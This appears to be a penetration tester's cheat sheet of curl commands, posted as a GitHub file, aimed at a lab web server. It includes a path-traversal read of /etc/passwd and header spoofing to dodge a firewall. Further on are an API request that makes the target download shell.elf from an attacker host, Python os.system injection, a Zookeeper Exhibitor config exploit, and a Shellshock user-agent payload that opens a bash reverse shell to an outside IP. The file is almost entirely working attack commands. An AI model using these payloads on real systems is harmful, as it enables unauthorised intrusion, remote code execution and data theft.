-
Notifications
You must be signed in to change notification settings - Fork 1
/
mxcurls
54 lines (40 loc) · 2.13 KB
/
mxcurls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
===================================
# Basics
curl -i 192.168.200.5
curl -iL 192.168.200.5
curl 192.168.200.5/robots.txt -s | html2text
curl 192.168.200.5 -s -L | html2text -width '99' | uniq
curl 192.168.200.5 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl http://192.168.200.5/logs?file=/etc/passwd
curl -i http://192.168.200.5/cgi-bin/admin.cgi -s | html2text
curl -i http://192.168.200.5/cgi-bin/test.cgi -s > test.cgi.txt
===================================
# WAF Dodge
curl http://192.168.200.5/logs --header "X-Forwarded-For: 127.0.0.1"
curl -A "GoogleBot" 192.168.200.5/robots.txt
curl -A 'Googlebot/2.1 (+http://www.google.com/bot.html)' https://192.168.200.5/bad.txt
curl -H 'User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)' http://192.168.200.5/robots.txt
curl --user-agent libwww-perl/6.08 http://192.168.200.5/robots.txt
===================================
# API
curl http://192.168.200.5/nodes
curl http://192.168.200.5/nodes -d ""
curl -X POST http://192.168.200.5/nodes
curl -s -i -X POST -H 'Content-Length: 0' http://192.168.200.5/weird
curl http://192.168.200.5/update --header "X-Forwarded-For: 127.0.0.1" -X POST
curl http://192.168.200.5/update --header "X-Forwarded-For: 127.0.0.1" -X POST -H 'Content-Type: application/json' -d '{"user":"bobadmin", "url":"http://192.168.162.46:22/shell.elf"}
curl http://192.168.200.5/restart --header "X-Forwarded-For: 127.0.0.1" -X POST -H 'Content-Type: application/json' -d '{"confirm":"true"}
===================================
# API Execution
curl http://192.168.200.5/verify
curl http://192.168.200.5/verify -d "code=2*9"
curl http://192.168.200.5/verify -d "code=os"
curl http://192.168.200.5/verify -d "code=os.system('whoami')
===================================
# Datafile for Exploit (Zookeeper)
vim data.json ..{ "zookeeperInstallDirectory": "/opt/zookeeper", "Data": "/zookeeper/data",...}
curl -X POST -d @data.json http://192.168.200.5:8080/exhibitor/v1/config/set
{"message":"OK","succeeded":true}
===================================
# Shellshock
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.162.46/PORT 0>&1' http://192.168.200.5/bad.txt